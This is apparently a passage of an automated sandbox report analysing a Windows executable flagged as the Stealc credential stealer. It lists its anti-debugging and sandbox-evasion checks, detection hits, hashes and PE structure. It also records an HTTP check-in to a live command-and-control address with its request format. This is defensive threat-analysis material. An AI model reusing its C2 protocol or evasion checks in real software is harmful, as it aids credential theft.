                Source: file.exe, 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13467
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13470
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13489
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13481
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13521
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C345C0 VirtualProtect ?,00000004,00000100,000000000_2_00C345C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C49860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C49860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C49750 mov eax, dword ptr fs:[00000030h]0_2_00C49750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C478E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00C478E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6800, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C49600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00C49600
                Source: file.exe, 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: file.exeBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00C47B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C47980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00C47980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C47850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00C47850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C47A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00C47A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.c30000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2133666234.00000000019BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2092431319.0000000005610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6800, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.c30000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2133666234.00000000019BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2092431319.0000000005610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6800, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phptrue
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.37/e2b1563c6670f193.php;file.exe, 00000000.00000002.2133666234.0000000001A34000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.phpKfile.exe, 00000000.00000002.2133666234.0000000001A34000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.37/e2b1563c6670f193.phpXNfile.exe, 00000000.00000002.2133666234.0000000001A44000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.37file.exe, 00000000.00000002.2133666234.00000000019BE000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown
                            http://185.215.113.37/e2b1563c6670f193.php/file.exe, 00000000.00000002.2133666234.0000000001A19000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://185.215.113.37/wsfile.exe, 00000000.00000002.2133666234.0000000001A19000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://185.215.113.37/e2b1563c6670f193.phpwfile.exe, 00000000.00000002.2133666234.0000000001A19000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  185.215.113.37
                                  		unknownPortugal
                                  		206894WHOLESALECONNECTIONSNLtrue

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1520716
                                  Start date and time:2024-09-27 19:03:10 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 3m 6s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:2
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:file.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 80%
                                  • Number of executed functions: 19
                                  • Number of non-executed functions: 91
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Stop behavior analysis, all processes terminated

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: file.exe

                                  Simulations

                                  Behavior and APIs

                                  No simulations

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  8y4qT1eVpi.exeGet hashmaliciousAmadey, StealcBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php

                                  Domains

                                  No context

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousAmadey, BitCoin Miner, SilentXMRMinerBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37
                                  kYpONUhAR5.exeGet hashmaliciousRedLineBrowse
                                  • 185.215.113.67
                                  file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                  • 185.215.113.103
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousAmadeyBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  No created / dropped files found

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.946286584348621
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:file.exe
                                  File size:1'858'048 bytes
                                  MD5:f413d695f62b9d29686880be5daedb80
                                  SHA1:5680fc5f5fd1689a5aa2d0682434b5c20f6784bc
                                  SHA256:5a8c2a4536f6c77609a753f916c001d169f7746b3cca7aee87ac4b0a2422ac03
                                  SHA512:7d896a69b7b261a8490eec5c9e5aa6274d05d030028c48d9f3132f00b2fad732308407a577a3a92421b754e2258f2f6d23e51a57b1cd84e306d954f5a34bfb49
                                  SSDEEP:49152:mC8SSnCXHsK7SjlHla8pNkZVyBgddi2dHX:NQKj1aNkZEBgd0
                                  TLSH:B285331139B3947EC75E2E3C70405B0733A64076825A6EBB598B6701BABE605FF1CDCA
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L.../..f...........

                                  File Icon

                                  Icon Hash:00928e8e8686b000

                                  Static PE Info

                                  General

                                  Entrypoint:0xaa4000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x66F1BA2F [Mon Sep 23 18:57:51 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                  Entrypoint Preview

                                  Instruction
                                  jmp 00007F0C5CCEBA6Ah
                                  pabsb mm0, qword ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  jmp 00007F0C5CCEDA65h
                                  add byte ptr [ebx], cl
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], dh
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  or byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [ecx], al
                                  add byte ptr [eax], 00000000h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  adc byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  push es
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax+0Ah], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  push es
                                  add byte ptr [eax], 00000000h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  adc byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add dword ptr [edx], ecx
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  xor byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  sub byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  push es
                                  add byte ptr [eax], 00000000h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  adc byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  push es
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [edi], cl
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax+eax*4], cl
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al

                                  Rich Headers

                                  Programming Language:
                                  • [C++] VS2010 build 30319
                                  • [ASM] VS2010 build 30319
                                  • [ C ] VS2010 build 30319
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [LNK] VS2010 build 30319

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  0x10000x25b0000x22800dea6efae217044aadd9bf37319e8bb30unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  0x25e0000x2a50000x200043eff8a374d1134cbb9f1deacd08809unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  cgvssnvn0x5030000x1a00000x19f6004f4d3a7a26c6b21d3613be4c2e328d09False0.9948659202904002data7.9531873822886014IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  oemmexyc0x6a30000x10000x60098d5cb62e8efb319041136532ce28e1aFalse0.5455729166666666data4.821352105257357IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .taggant0x6a40000x30000x2200077d3b80c09310c1089c2f00dd604797False0.059283088235294115DOS executable (COM)0.6045636863014441IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                  Imports

                                  DLLImport
                                  kernel32.dlllstrcpy

                                  Network Behavior

                                  Suricata IDS Alerts

                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2024-09-27T19:04:09.324295+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.3780TCP

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Sep 27, 2024 19:04:08.341994047 CEST4970480192.168.2.5185.215.113.37
                                  Sep 27, 2024 19:04:08.347012043 CEST8049704185.215.113.37192.168.2.5
                                  Sep 27, 2024 19:04:08.347095013 CEST4970480192.168.2.5185.215.113.37
                                  Sep 27, 2024 19:04:08.347240925 CEST4970480192.168.2.5185.215.113.37
                                  Sep 27, 2024 19:04:08.351989985 CEST8049704185.215.113.37192.168.2.5
                                  Sep 27, 2024 19:04:09.092248917 CEST8049704185.215.113.37192.168.2.5
                                  Sep 27, 2024 19:04:09.092442036 CEST4970480192.168.2.5185.215.113.37
                                  Sep 27, 2024 19:04:09.095781088 CEST4970480192.168.2.5185.215.113.37
                                  Sep 27, 2024 19:04:09.100754976 CEST8049704185.215.113.37192.168.2.5
                                  Sep 27, 2024 19:04:09.324174881 CEST8049704185.215.113.37192.168.2.5
                                  Sep 27, 2024 19:04:09.324295044 CEST4970480192.168.2.5185.215.113.37
                                  Sep 27, 2024 19:04:13.101089001 CEST4970480192.168.2.5185.215.113.37

                                  HTTP Request Dependency Graph

                                  • 185.215.113.37

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.549704185.215.113.37806800C:\Users\user\Desktop\file.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 27, 2024 19:04:08.347240925 CEST89OUTGET / HTTP/1.1
                                  Host: 185.215.113.37
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Sep 27, 2024 19:04:09.092248917 CEST203INHTTP/1.1 200 OK
                                  Date: Fri, 27 Sep 2024 17:04:08 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Sep 27, 2024 19:04:09.095781088 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----IEHCBAFIDAECBGCBFHJE
                                  Host: 185.215.113.37
                                  Content-Length: 211
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 37 31 46 44 32 38 45 30 30 43 39 33 37 34 30 31 30 35 32 38 31 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 2d 2d 0d 0a
                                  Data Ascii: ------IEHCBAFIDAECBGCBFHJEContent-Disposition: form-data; name="hwid"671FD28E00C93740105281------IEHCBAFIDAECBGCBFHJEContent-Disposition: form-data; name="build"save------IEHCBAFIDAECBGCBFHJE--
                                  Sep 27, 2024 19:04:09.324174881 CEST210INHTTP/1.1 200 OK
                                  Date: Fri, 27 Sep 2024 17:04:09 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 8
                                  Keep-Alive: timeout=5, max=99
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 59 6d 78 76 59 32 73 3d
                                  Data Ascii: YmxvY2s=


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:13:04:04
                                  Start date:27/09/2024
                                  Path:C:\Users\user\Desktop\file.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                  Imagebase:0xc30000
                                  File size:1'858'048 bytes
                                  MD5 hash:F413D695F62B9D29686880BE5DAEDB80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2133666234.00000000019BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2092431319.0000000005610000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:7.5%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:10.1%
                                    Total number of Nodes:2000
                                    Total number of Limit Nodes:24
